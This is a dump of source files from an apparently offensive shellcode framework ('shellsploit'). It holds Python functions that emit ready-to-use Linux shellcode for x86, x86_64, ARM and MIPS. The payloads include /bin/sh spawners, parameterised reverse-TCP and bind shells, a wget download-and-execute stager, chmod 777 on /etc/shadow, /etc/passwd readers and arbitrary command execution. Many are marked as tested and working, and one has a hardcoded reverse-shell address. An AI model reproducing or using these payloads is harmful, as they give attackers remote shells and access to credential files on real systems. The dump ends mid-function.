https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/Linux/__init__.py -------------------------------------------------------------------------------- /shell/database/Linux/magic.py: -------------------------------------------------------------------------------- 1 | def merlin( counter): 2 | return r"\x31\xc0\x40\x74"+counter -------------------------------------------------------------------------------- /shell/database/Linux64/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/Linux64/__init__.py -------------------------------------------------------------------------------- /shell/database/Linux64/bin_shx64.py: -------------------------------------------------------------------------------- 1 | #;Title: execve shellcode 22 bytes 2 | #;Author: d4sh&r 3 | #;Contact: https://mx.linkedin.com/in/d4v1dvc 4 | #;Category: Shellcode 5 | #;Architecture:linux x86_64 6 | 7 | 8 | #WORKED 9 | #Linux whoami 3.19.0-37-generic #42~14.04.1-Ubuntu SMP Mon Nov 23 15:13:51 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 10 | def bin_shx64(): 11 | return r"\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05" 12 | """ 13 | global _start 14 | 15 | _start: 16 | mul esi 17 | push rdx 18 | mov rbx, 0x68732f2f6e69622f ;/bin//sh 19 | push rbx 20 | lea rdi, [rsp] ;address of /bin//sh 21 | mov al, 59 ;execve 22 | syscall 23 | """ -------------------------------------------------------------------------------- /shell/database/Linux64/chmod.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/13915/ 2 | 3 | 4 | #Will be rewritten .. 5 | 6 | 7 | """ 8 | /* 9 | Title: Linux/x86-64 - setuid(0) & chmod ("/etc/passwd", 0777) & exit(0) - 63 bytes 10 | Date: 2010-06-17 11 | Tested: Archlinux x86_64 k2.6.33 12 | 13 | Author: Jonathan Salwan 14 | Web: http://shell-storm.org | http://twitter.com/jonathansalwan 15 | 16 | ! Dtabase of shellcodes http://www.shell-storm.org/shellcode/ 17 | 18 | 19 | 20 | <-- _setuid(0) --> 21 | 400078: 48 31 ff xor %rdi,%rdi 22 | 40007b: 48 31 c0 xor %rax,%rax 23 | 40007e: b0 69 mov $0x69,%al 24 | 400080: 0f 05 syscall 25 | 26 | <-- _chmod("/etc/shadow", 0777) --> 27 | 400082: 48 31 d2 xor %rdx,%rdx 28 | 400085: 66 be ff 01 mov $0x1ff,%si 29 | 400089: 48 bb ff ff ff ff ff mov $0x776f64ffffffffff,%rbx 30 | 400090: 64 6f 77 31 | 400093: 48 c1 eb 28 shr $0x28,%rbx 32 | 400097: 53 push %rbx 33 | 400098: 48 bb 2f 65 74 63 2f mov $0x6168732f6374652f,%rbx 34 | 40009f: 73 68 61 35 | 4000a2: 53 push %rbx 36 | 4000a3: 48 89 e7 mov %rsp,%rdi 37 | 4000a6: 48 31 c0 xor %rax,%rax 38 | 4000a9: b0 5a mov $0x5a,%al 39 | 40 | <-- _exit(0) --> 41 | 4000ab: 0f 05 syscall 42 | 4000ad: 48 31 ff xor %rdi,%rdi 43 | 4000b0: 48 31 c0 xor %rax,%rax 44 | 4000b3: b0 3c mov $0x3c,%al 45 | 4000b5: 0f 05 syscall 46 | */ 47 | 48 | """ 49 | 50 | 51 | 52 | def chmod( file): 53 | 54 | "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05" 55 | "\x48\x31\xd2\x66\xbe\xff\x01\x48\xbb\xff" 56 | "\xff\xff\xff\xff\x64\x6f\x77\x48\xc1\xeb" 57 | "\x28\x53\x48\xbb\x2f\x65\x74\x63\x2f\x73" 58 | "\x68\x61\x53\x48\x89\xe7\x48\x31\xc0\xb0" 59 | "\x5a\x0f\x05\x48\x31\xff\x48\x31\xc0\xb0" 60 | "\x3c\x0f\x05"; 61 | 62 | -------------------------------------------------------------------------------- /shell/database/Linux64/readfilex64.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-878.php 2 | #; Author Mr.Un1k0d3r - RingZer0 Team 3 | #; Read /etc/passwd Linux x86_64 Shellcode 4 | #; Shellcode size 82 bytes 5 | 6 | #WORK TESTED 7 | #Linux whoami 3.19.0-37-generic #42~14.04.1-Ubuntu SMP Mon Nov 23 15:13:51 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 8 | def readx64( path): 9 | shellcode = r"\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31" 10 | shellcode += r"\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89" 11 | shellcode += r"\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48" 12 | shellcode += r"\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01" 13 | shellcode += r"\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff" 14 | shellcode += r"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41" 15 | shellcode += path 16 | return shellcode 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /shell/database/Linux64/reverse_tcpx64.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-857.php 2 | 3 | #Title : reversetcpbindshell (118 bytes) 4 | #Date : 04 October 2013 5 | #Author : Russell Willis 6 | #Tested on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux) 7 | 8 | 9 | #WORK TESTED 10 | #Linux whoami 3.19.0-33-generic #38~14.04.1-Ubuntu SMP Fri Nov 6 18:17:28 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux 11 | def reverse_tcpx64( IP, PORT): 12 | shellcode = r"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" 13 | shellcode += r"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" 14 | shellcode += r"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02" 15 | shellcode += PORT 16 | shellcode += r"\xc7\x44\x24\x04" 17 | shellcode += IP 18 | shellcode += r"\x48\x89\xe6\x6a\x10" 19 | shellcode += r"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48" 20 | shellcode += r"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" 21 | shellcode += r"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" 22 | shellcode += r"\x5f\x6a\x3b\x58\x0f\x05" 23 | return shellcode 24 | 25 | -------------------------------------------------------------------------------- /shell/database/Linux64/tcp_bindx64.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/39151/ 2 | 3 | 4 | 5 | 6 | def tcp_bindx64( PORT): 7 | shellcode = r"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a" 8 | shellcode += r"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0" 9 | shellcode += r"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02" 10 | shellcode += PORT 11 | shellcode += r"\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05" 12 | shellcode += r"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31" 13 | shellcode += r"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59" 14 | shellcode += r"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48" 15 | shellcode += r"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a" 16 | shellcode += r"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54" 17 | shellcode += r"\x5f\x6a\x3b\x58\x0f\x05" 18 | return shellcode 19 | 20 | -------------------------------------------------------------------------------- /shell/database/Linux86/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/Linux86/__init__.py -------------------------------------------------------------------------------- /shell/database/Linux86/bin_shx86.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/37251/ 2 | 3 | def bin_shx86(): 4 | shellcode = r"\x31\xc0\x50\x68\x2f\x2f" 5 | shellcode += r"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc2\xb0\x0b\xcd\x80" 6 | return shellcode 7 | 8 | 9 | 10 | 11 | """ 12 | Linux/x86 execve /bin/sh shellcode 21 bytes 13 | 14 | 08048060 <.text>: 15 | 8048060: 31 c0 xor %eax,%eax 16 | 8048062: 50 push %eax 17 | 8048063: 68 2f 2f 73 68 push $0x68732f2f 18 | 8048068: 68 2f 62 69 6e push $0x6e69622f 19 | 804806d: 89 e3 mov %esp,%ebx 20 | 804806f: 89 c2 mov %eax,%edx 21 | 8048071: b0 0b mov $0xb,%al 22 | 8048073: cd 80 int $0x80 23 | 24 | """ 25 | 26 | 27 | 28 | 29 | #self.disassembly = self.disassembly.replace("\\x", "") 30 | #str(bytearray(self.disassembly.decode("hex"))) -------------------------------------------------------------------------------- /shell/database/Linux86/chmod.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/37285/ 2 | #WORK 3 | 4 | 5 | def ch( filee): 6 | shellcode = r"\x31\xc0\x50" 7 | shellcode += filee 8 | shellcode += r"\xb0\x0f\x89\xe3\x66\xb9\xff\x01\xcd\x80\x31\xc0\x40\xcd\x80" 9 | return shellcode 10 | 11 | 12 | 13 | """ 14 | Linux/x86 - chmod() 777 /etc/shadow & exit() - 33 bytes 15 | 16 | 08048060 <.text>: 17 | 8048060: 31 c0 xor %eax,%eax 18 | 8048062: 50 push %eax 19 | 8048063: 68 61 64 6f 77 push $0x776f6461 20 | 8048068: 68 63 2f 73 68 push $0x68732f63 21 | 804806d: 68 2f 2f 65 74 push $0x74652f2f 22 | 8048072: b0 0f mov $0xf,%al 23 | 8048074: 89 e3 mov %esp,%ebx 24 | 8048076: 66 b9 ff 01 mov $0x1ff,%cx 25 | 804807a: cd 80 int $0x80 26 | 804807c: 31 c0 xor %eax,%eax 27 | 804807e: 40 inc %eax 28 | 804807f: cd 80 int $0x80 29 | 30 | """ 31 | 32 | -------------------------------------------------------------------------------- /shell/database/Linux86/download.py: -------------------------------------------------------------------------------- 1 | def downloadANDexecute( url, filename): 2 | shellcode = r"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f" 3 | shellcode += filename 4 | shellcode += r"\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50" 5 | shellcode += filename 6 | shellcode += r"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52" 7 | shellcode += url 8 | shellcode += r"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80" 9 | return shellcode -------------------------------------------------------------------------------- /shell/database/Linux86/execc.py: -------------------------------------------------------------------------------- 1 | def execc( command): 2 | shellcode = r"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f" 3 | shellcode += r"\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x12\x00\x00\x00" 4 | db = [] 5 | for x in command: 6 | db.append("\\x"+x.encode("hex")) 7 | shellcode += "".join(db) 8 | shellcode += r"\x00\x57\x53\x89\xe1\xcd\x80" 9 | return shellcode 10 | 11 | 12 | -------------------------------------------------------------------------------- /shell/database/Linux86/readfilex86.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/37359/ 2 | 3 | def readx86( filee): 4 | shellcode = r"\x31\xc9\x31\xc0\x31\xd2\x51\xb0\x05" 5 | shellcode += filee 6 | shellcode += r"\x89\xe3\xcd\x80\x89\xd9\x89\xc3\xb0\x03\x66" 7 | shellcode += r"\xba\xff\x0f\x66\x42\xcd\x80\x31" 8 | shellcode += r"\xc0\x31\xdb\xb3\x01\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80" 9 | return shellcode 10 | 11 | #WORK 12 | #4.0.0-kali1-686-pae 13 | 14 | """ 15 | Linux/x86 - /etc/passwd Reader - 58 bytes 16 | 17 | 08048060 <.text>: 18 | 8048060: 31 c9 xor %ecx,%ecx 19 | 8048062: 31 c0 xor %eax,%eax 20 | 8048064: 31 d2 xor %edx,%edx 21 | 8048066: 51 push %ecx 22 | 8048067: b0 05 mov $0x5,%al 23 | 8048069: 68 73 73 77 64 push $0x64777373 24 | 804806e: 68 63 2f 70 61 push $0x61702f63 25 | 8048073: 68 2f 2f 65 74 push $0x74652f2f 26 | 8048078: 89 e3 mov %esp,%ebx 27 | 804807a: cd 80 int $0x80 28 | 804807c: 89 d9 mov %ebx,%ecx 29 | 804807e: 89 c3 mov %eax,%ebx 30 | 8048080: b0 03 mov $0x3,%al 31 | 8048082: 66 ba ff 0f mov $0xfff,%dx 32 | 8048086: 66 42 inc %dx 33 | 8048088: cd 80 int $0x80 34 | 804808a: 31 c0 xor %eax,%eax 35 | 804808c: 31 db xor %ebx,%ebx 36 | 804808e: b3 01 mov $0x1,%bl 37 | 8048090: b0 04 mov $0x4,%al 38 | 8048092: cd 80 int $0x80 39 | 8048094: 31 c0 xor %eax,%eax 40 | 8048096: b0 01 mov $0x1,%al 41 | 8048098: cd 80 int $0x80 42 | 43 | """ 44 | 45 | -------------------------------------------------------------------------------- /shell/database/Linux86/reverse_tcpx86.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/36397/ 2 | #Linux x86 - Reverse TCP Shell - 72 bytes 3 | #Author: xmgv 4 | #Details: https://xmgv.wordpress.com/2015/02/21/slae-assignment-2-reverse-shell/ 5 | 6 | 7 | #WORK 4.0.0-kali1-686-pae 8 | #Connect : nc -lvp [PORT] 9 | def reverse_tcpx86( IP, PORT): 10 | shellcode = r"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0" 11 | shellcode += r"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68" 12 | shellcode += IP 13 | shellcode += r"\x66\x68" 14 | shellcode += PORT 15 | shellcode += r"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1" 16 | shellcode += r"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" 17 | return shellcode 18 | 19 | 20 | -------------------------------------------------------------------------------- /shell/database/Linux86/tcp_bindx86.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/36398/ 2 | #Linux x86 - TCP Bind Shell - 96 bytes 3 | #Author: xmgv 4 | #Details: https://xmgv.wordpress.com/2015/02/19/28/ 5 | 6 | #WORKED 7 | #Linux 4.0.0-kali1-686-pae #1 SMP Debian 4.0.4-1+kali2 (2015-06-03) i686 GNU/Linux 8 | #Connect : nc [TARGET] [PORT] 9 | def tcp_bindx86( PORT): 10 | shellcode = r"\x31\xdb\xf7\xe3\xb0\x66\xb3\x01\x52\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0" 11 | shellcode += r"\x66\x43\x52\x66\x68" 12 | shellcode += PORT 13 | shellcode += r"\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x52\x56\x89" 14 | shellcode += r"\xe1\xcd\x80\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x93\x31\xc9\xb1\x02" 15 | shellcode += r"\xb0\x3f\xcd\x80\x49\x79\xf9\x92\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" 16 | shellcode += r"\x89\xe3\x50\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80" 17 | return shellcode 18 | -------------------------------------------------------------------------------- /shell/database/LinuxARM/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/LinuxARM/__init__.py -------------------------------------------------------------------------------- /shell/database/LinuxARM/bin_sh.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-855.php 2 | #Author : gunslinger_ (yuda at cr0security dot com) 3 | 4 | def bin_sh(): 5 | shellcode = r"\x01\x60\x8f\xe2" 6 | shellcode += r"\x16\xff\x2f\xe1" 7 | shellcode += r"\x40\x40" 8 | shellcode += r"\x78\x44" 9 | shellcode += r"\x0c\x30" 10 | shellcode += r"\x49\x40" 11 | shellcode += r"\x52\x40" 12 | shellcode += r"\x0b\x27" 13 | shellcode += r"\x01\xdf" 14 | shellcode += r"\x01\x27" 15 | shellcode += r"\x01\xdf" 16 | shellcode += r"\x2f\x2f" 17 | shellcode += r"\x62\x69\x6e\x2f" 18 | shellcode += r"\x2f\x73" 19 | shellcode += r"\x68" 20 | return shellcode 21 | -------------------------------------------------------------------------------- /shell/database/LinuxARM/chmod.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-853.php 2 | #Author : gunslinger_ (yuda at cr0security dot com) 3 | 4 | def chmod( path): 5 | shellcode = r"\x01\x60\x8f\xe2" 6 | shellcode += r"\x16\xff\x2f\xe1" 7 | shellcode += r"\x78\x46" 8 | shellcode += r"\x10\x30" 9 | shellcode += r"\xff\x21" 10 | shellcode += r"\xff\x31" 11 | shellcode += r"\x01\x31" 12 | shellcode += r"\x0f\x37" 13 | shellcode += r"\x01\xdf" 14 | shellcode += r"\x40\x40" 15 | shellcode += r"\x01\x27" 16 | shellcode += r"\x01\xdf" 17 | shellcode += path 18 | return shellcode -------------------------------------------------------------------------------- /shell/database/LinuxARM/execc.py: -------------------------------------------------------------------------------- 1 | def execc( command): 2 | shellcode = r"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0a\x30\x01\x90" 3 | shellcode += r"\x01\xa9\x92\x1a\x0b\x27\x01\xdf" 4 | db = [] 5 | for x in command: 6 | db.append("\\x"+x.encode("hex")) 7 | shellcode += "".join(db) 8 | return shellcode -------------------------------------------------------------------------------- /shell/database/LinuxARM/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-821.php 2 | 3 | 4 | 5 | def reverse_tcp( HOST,PORT): 6 | shellcode = r"\x01\x10\x8F\xE2" 7 | shellcode += r"\x11\xFF\x2F\xE1" 8 | shellcode += r"\x02\x20\x01\x21" 9 | shellcode += r"\x92\x1a\x0f\x02" 10 | shellcode += r"\x19\x37\x01\xdf" 11 | shellcode += r"\x06\x1c\x08\xa1" 12 | shellcode += r"\x10\x22\x02\x37" 13 | shellcode += r"\x01\xdf\x3f\x27" 14 | shellcode += r"\x02\x21" 15 | shellcode += r"\x30\x1c\x01\xdf" 16 | shellcode += r"\x01\x39\xfb\xd5" 17 | shellcode += r"\x05\xa0\x92\x1a" 18 | shellcode += r"\x05\xb4\x69\x46" 19 | shellcode += r"\x0b\x27\x01\xdf" 20 | shellcode += r"\xc0\x46" 21 | shellcode += r"0x02, 0x00" 22 | shellcode += PORT 23 | shellcode += r"\x13\x37" 24 | shellcode += HOST 25 | shellcode += r"\x2f\x62\x69\x6e\x2f\x73\x68" 26 | return shellcode -------------------------------------------------------------------------------- /shell/database/LinuxMIPS/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vasco2016/shellsploit-framework/04eb4a0449acaba0b70c40a78c61a0d5e2527406/shell/database/LinuxMIPS/__init__.py -------------------------------------------------------------------------------- /shell/database/LinuxMIPS/bin_sh.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/35868/ 2 | def bin_sh(): 3 | shellcode = r"\xff\xff" 4 | shellcode += r"\x06\x28\xff\xff\xd0" 5 | shellcode += r"\x04\xff\xff\x05\x28" 6 | shellcode += r"\x01\x10\xe4\x27\x0f" 7 | shellcode += r"\xf0\x84\x24\xab\x0f" 8 | shellcode += r"\x02\x24\x0c\x01\x01\x01" 9 | return shellcode 10 | -------------------------------------------------------------------------------- /shell/database/LinuxMIPS/chmod.py: -------------------------------------------------------------------------------- 1 | #https://www.exploit-db.com/exploits/36276/ 2 | #Date: 2015-03-05 3 | #Author: Sang-Min LEE 4 | #Email: leesangmin144@gmail.com 5 | #Blog: http://smleenull.tistory.com 6 | 7 | def chmod( path): 8 | shellcode = r"\xff\xff\x06" 9 | shellcode += r"\x28\xff\xff" 10 | shellcode += r"\xd0\x04\xff" 11 | shellcode += r"\xff\x05\x28" 12 | shellcode += r"\xb6\x01\x05" 13 | shellcode += r"\x24\x01\x10" 14 | shellcode += r"\xe4\x27\x1f" 15 | shellcode += r"\xf0\x84\x24" 16 | shellcode += r"\xaf\x0f\x02" 17 | shellcode += r"\x24\x0c\x01" 18 | shellcode += r"\x01\x01\xff" 19 | shellcode += r"\xff\x04\x28" 20 | shellcode += r"\xa1\x0f\x02" 21 | shellcode += r"\x24\x0c\x01" 22 | shellcode += r"\x01\x01" 23 | shellcode += path 24 | return shellcode 25 | 26 | -------------------------------------------------------------------------------- /shell/database/LinuxMIPS/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-860.php 2 | #Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators 3 | 4 | 5 | """ 6 | #Close stdin(0) 7 | slti $a0, $zero, 0xFFFF 8 | li $v0, 4006 9 | syscall 0x42424 10 | 11 | #Close stdout(1) 12 | slti $a0, $zero, 0x1111 13 | li $v0, 4006 14 | syscall 0x42424 15 | 16 | #Close stderr(2) 17 | li $t4, 0xFFFFFFFD #-3 18 | not $a0, $t4 19 | li $v0, 4006 20 | syscall 0x42424 21 | 22 | #Socket Domain - AF_INET (2) 23 | li $t4, 0xFFFFFFFD #-3 24 | not $a0, $t4 25 | #Socket Type - SOCK_STREAM (2 for mips) 26 | not $a1, $t4 27 | #Socket Protocol - 0 28 | slti $a2, $zero, 0xFFFF 29 | #Call socket 30 | li $v0, 4183 31 | syscall 0x42424 32 | 33 | #Move socket return value (v0) to register a0 34 | #V0 must be below 0xFFFF/65535 35 | andi $a0, $v0, 0xFFFF 36 | 37 | #Calling dup three times 38 | #Duplicate FD (stdin) 39 | #Socket returned fd 0 - stdin goes to socket 40 | #----- 41 | #Duplicate FD (stdout) 42 | li $v0, 4041 43 | syscall 0x42424 44 | #Duplicate FD (stderr) 45 | li $v0, 4041 46 | syscall 0x42424 47 | 48 | #Connect sockfd 49 | #Socket FD is already in a0 50 | #----- 51 | #Connect sockaddr 52 | lui $a1, 0x6979 #Port: 53 | ori $a1, 0xFF01 #31337 54 | addi $a1, $a1, 0x0101 55 | sw $a1, -8($sp) 56 | 57 | li $a1, 0xB101A8C0 #192.168.1.177 58 | sw $a1, -4($sp) 59 | addi $a1, $sp, -8 60 | 61 | #Connect addrlen - 16 62 | li $t4, 0xFFFFFFEF #-17 63 | not $a2, $t4 64 | #Call connect 65 | li $v0, 4170 66 | syscall 0x42424 67 | 68 | #Putting /bin/sh onto the stack 69 | lui $t0, 0x6962 #Loading Upper Immediate - ib 70 | ori $t0, $t0,0x2f2f #Bitwise OR Immediate - // 71 | sw $t0, -20($sp) #Store word pointer to command string for execution 72 | # 73 | lui $t0, 0x6873 #Loading Upper Immediate - hs 74 | ori $t0, 0x2f6e #Bitwise OR Immediate - /n 75 | sw $t0, -16($sp) #Store word pointer to command string for execution 76 | # 77 | slti $a3, $zero, 0xFFFF #Putting null (0) onto stack 78 | sw $a3, -12($sp) 79 | sw $a3, -4($sp) 80 | 81 | #execve *filename 82 | addi $a0, $sp, -20 83 | #execve *argv[] 84 | addi $t0, $sp, -20 85 | sw $t0, -8($sp) 86 | addi $a1, $sp, -8 87 | # 88 | addiu $sp, $sp, -20 #Adjusting stack 89 | # 90 | #execve envp[] - 0 91 | slti $a2, $zero, 0xFFFF 92 | #Call execve 93 | li $v0, 4011 94 | syscall 0x42424 95 | 96 | 97 | 98 | # NOTE: Assembled shellcode 99 | 100 | #200 byte Linux MIPS reverse shell shellcode by Jacob Holcomb of ISE 101 | #Connects on 192.168.1.177:31337 102 | stg3_SC = "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28" 103 | stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01" 104 | stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01" 105 | stg3_SC += "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01" 106 | stg3_SC += "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24" 107 | stg3_SC += "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20" 108 | stg3_SC += "\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf" 109 | stg3_SC += "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" 110 | stg3_SC += "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf" 111 | stg3_SC += "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28" 112 | stg3_SC += "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23" 113 | stg3_SC += "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28" 114 | stg3_SC += "\xab\x0f\x02\x24\x0c\x09\x09\x01" 115 | 116 | 117 | 118 | """ 119 | -------------------------------------------------------------------------------- /shell/database/LinuxMIPS/tcp_bind.py: -------------------------------------------------------------------------------- 1 | #http://shell-storm.org/shellcode/files/shellcode-81.php 2 | 3 | """ 4 | /* - MIPS little-endian 5 | * - linux port listener 276 bytes shellcode 6 | * - execve("/bin/sh",["/bin/sh"],[]); 7 | * - port 0x1337 (4919) 8 | * - tested on Linksys WRT54G/GL (DD-WRT Linux) 9 | * - based on scut paper Writing MIPS/Irix shellcode 10 | * 11 | * vaicebine at gmail dot com 12 | */ 13 | """ 14 | def tcp_bind( PORT): 15 | shellcode = r"\xe0\xff\xbd\x27" 16 | shellcode += r"\xfd\xff\x0e\x24" 17 | shellcode += r"\x27\x20\xc0\x01" 18 | shellcode += r"\x27\x28\xc0\x01" 19 | shellcode += r"\xff\xff\x06\x28" 20 | shellcode += r"\x57\x10\x02\x24" 21 | shellcode += r"\x0c\x01\x01\x01" 22 | shellcode += r"\x50\x73\x0f\x24" 23 | shellcode += r"\xff\xff\x50\x30" 24 | shellcode += r"\xef\xff\x0e\x24" 25 | shellcode += r"\x27\x70\xc0\x01" 26 | shellcode += PORT 27 | shellcode += r"\x0d\x24" 28 | shellcode += r"\x04\x68\xcd\x01" 29 | shellcode += r"\xff\xfd\x0e\x24" 30 | shellcode += r"\x27\x70\xc0\x01" 31 | shellcode += r"\x25\x68\xae\x01" 32 | shellcode += r"\xe0\xff\xad\xaf" 33 | shellcode += r"\xe4\xff\xa0\xaf" 34 | shellcode += r"\xe8\xff\xa0\xaf" 35 | shellcode += r"\xec\xff\xa0\xaf" 36 | shellcode += r"\x25\x20\x10\x02" 37 | shellcode += r"\xef\xff\x0e\x24" 38 | shellcode += r"\x27\x30\xc0\x01" 39 | shellcode += r"\xe0\xff\xa5\x23" 40 | shellcode += r"\x49\x10\x02\x24" 41 | shellcode += r"\x0c\x01\x01\x01" 42 | shellcode += r"\x50\x73\x0f\x24" 43 | shellcode += r"\x25\x20\x10\x02" 44 | shellcode += r"\x01\x01\x05\x24" 45 | shellcode += r"\x4e\x10\x02\x24" 46 | shellcode += r"\x0c\x01\x01\x01" 47 | shellcode += r"\x50\x73\x0f\x24" 48 | shellcode += r"\x25\x20\x10\x02" 49 | shellcode += r"\xff\xff\x05\x28" 50 | shellcode += r"\xff\xff\x06\x28" 51 | shellcode += r"\x48\x10\x02\x24" 52 | shellcode += r"\x0c\x01\x01\x01" 53 | shellcode += r"\x50\x73\x0f\x24" 54 | shellcode += r"\xff\xff\x50\x30" 55 | shellcode += r"\x25\x20\x10\x02" 56 | shellcode += r"\xfd\xff\x0f\x24" 57 | shellcode += r"\x27\x28\xe0\x01" 58 | shellcode += r"\xdf\x0f\x02\x24" 59 | shellcode += r"\x0c\x01\x01\x01" 60 | shellcode += r"\x50\x73\x0f\x24" 61 | shellcode += r"\x25\x20\x10\x02" 62 | shellcode += r"\x01\x01\x05\x28" 63 | shellcode += 